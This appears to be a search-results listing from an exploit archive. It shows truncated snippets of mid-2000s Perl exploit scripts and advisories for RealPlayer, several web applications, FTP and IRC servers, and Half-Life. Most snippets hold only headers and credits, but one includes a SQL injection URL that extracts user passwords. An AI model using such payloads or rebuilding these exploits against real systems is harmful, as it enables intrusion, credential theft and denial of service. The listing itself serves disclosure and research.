1086 matches found
realplayer-swf-PoC.pl.txt
!/usr/bin/perl RealPlayer: Buffer overflow vulnerability / PoC CVE-2006-0323 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323 RealNetworks Advisory http://service.real.com/realplayer/security/03162006player/en/ Federico L. Bossi Bonin fbossiatnetcomm.com.ar Program received signal...
GreyMatter WebLog 1.21d - Remote Command Execution (2)
GreyMatter WebLog 1.21d - Remote Command Execution 2 !/usr/bin/perl Exploit by Hessam-x www.hessamx.net Special Thanx : Vampire , s3rv3rhack3r / | \ | | / \ \ / | |/ // \ \ / \ Y // \ | | \ | / \ / / / / / / Iran Hackerz Security Team WebSite: www.hackerz.ir DeltaHAcking Team website:...
Aztek Forum 4.00 (myadmin.php) User Privilege Escalation Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; Aztek Forum 4.00 Change User Rights Remote Exploit only if the magicquote are : OFF Hum hum , sorry for my bad english i'm french ; Note : Before using this exploit you must create a count on the board : And this count will receive...
TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit
No description provided by source. !/usr/bin/perl Copyright C undefined1 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at your option any...
ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl ShoutLIVE = 1.1.0 Remote Php Code Execution Based on: http://www.frsirt.com/bulletins/4109 Credits: Coded by DarkFig Website: http://disarm.free.fr/bohard/ Greetz: All AcidRoot/Bod members = use IO::Socket; use LWP::Simple; if!$ARGV1headers; print...
Dropbear OpenSSH Server - MAX_UNAUTH_CLIENTS Denial of Service
Dropbear OpenSSH Server - MAXUNAUTHCLIENTS Denial of Service !/usr/bin/perl I needed a working test script so here it is. just a keep alive thread, I had a few problems with Pablo's code running properly. Straight from Pablo Fernandez's advisory: Vulnerable code is in svr-main.c / check for max...
d2kBlog 1.0.3 - 'memName' SQL Injection
!/usr/bin/perl -w D2KBLOG SQL injection Discovered by : Farhad Koosha farhadkey at kapda.ir Exploited by : devilbox devilbox at kapda.ir member of : Kapda.ir - Security Science Researchers Institute of Iran persianhacker.net require LWP::UserAgent; require HTTP::Request; print...
UnrealIRCd 3.x - Remote Denial of Service
UnrealIRCd 3.x - Remote Denial of Service source: https://www.securityfocus.com/bid/17057/info UnrealIRCd is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. !/usr/bin/perl Denial of Service exploit for UnrealIRCd...
[Full-disclosure] HYSA-2006-005 WordPress 2.0.1 Remote DoS Exploit
------------------------------------------------------ HYSA-2006-005 h4cky0u.org Advisory 014 ------------------------------------------------------ Date - Wed March 08 2006 TITLE: ====== WordPress 2.0.1 Remote DoS Exploit SEVERITY: ========= Medium SOFTWARE: ========= Wordpress 2.0.1 and prior...
D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications =========================================================== D2-Shoutbox 4.2 IPB Mod load Remote SQL Injection Exploit =========================================================== !/usr/bin/perl | | | \ | | |/ D2-Shoutbox 4.2IPB Mod=SQL...
ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)
!/usr/bin/perl ---------------------------------------------------- ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server Jerome Athias ---------------------------------------------------- use Net::FTP; geting data $host = @ARGV0; $port = @ARGV1; $debug = @ARGV2; $user = @ARGV3; $pass = @ARGV4;...
ArGoSoft FTP Server <= 1.4.3.5 Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/perl ---------------------------------------------------- ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server Jerome Athias ---------------------------------------------------- use Net::FTP; geting data $host = @ARGV0; $port = @ARGV1; $debug = @ARGV2;...
Pentacle In-Out Board <= 6.03 (newsdetailsview) Remote SQL Injection
No description provided by source. !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Usage: penta.pl victim directory Original Advisory: http://www.nukedx.com/?viewdoc=14 use IO::Socket; if@ARGV 3 print " ++ +Pentacle In-O...
phpWebSite 0.10.0-full - topics.php SQL Injection
phpWebSite 0.10.0-full - topics.php SQL Injection !/usr/bin/perl advisory sent in by SnIpErSA selfar2002athotmail.com http://www.target.com/topics.php?op=viewtopic&topic=-1%20Union%20select%20name,name,pass,name%20From%20users%20where%20uid=1 ported by str0ke milw0rm.com from x97Rangs code RST/GH...
MiniNukeCMS.txt
--Security Report-- Advisory: MiniNuke CMS System all versions pages.asp SQL Injection vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 19/02/06 10:31 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: MiniNuke...
Admbook <= 1.2.2 (X-Forwarded-For) Remote Command Execution Exploit
Exploit for unknown platform in category web applications =================================================================== Admbook autisticiorg |\r\n"; print "| |\r\n"; print "| Sun-Tzu: "Rouse him, and learn the principle of his activity or |\r\n"; print "| inactivity. Force him to reveal...
Admbook <= 1.2.2 (X-Forwarded-For) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl -w use IO::Socket; print "\r\n"; print "| Admbook =1.2.2 X-Forwarded-For cmmnds xctn xploit |\r\n"; print "| By rgod rgodATautisticiDOTorg |\r\n"; print "| site: http://retrogod.altervista.org |\r\n"; print "| |\r\n"; print "| Sun-Tzu: "Rouse him,...
MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications =========================================================== MiniNuke ICQ: 10072 MSN/Main: email protected web: www.nukedx.com Orginal advisory: http://www.nukedx.com/?viewdoc=9 Usage: mini.pl use IO::Socket; if@ARGV != 3 print " ++ +Welcom...
Fortinet-url.txt
URL filter bypass in Fortinet Severity: Low Impact: Bypass Fortinet web filter Vulnerabilty type: Design error Affected products: FortiGate v2.8 CVE reference: CAN-2005-3058 Vulnerability Description: ------------------------- It is possible to bypass Fortinet URL blocker by making special HTTP...
halfLifeDoS.txt
There is an ability to enter a Half-Life server in an infinite loop and to stop processing any requests exploit: !/usr/bin/perl Half-Life engine remote DoS exploit bug found by Firestorm tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server use IO::Socket; die...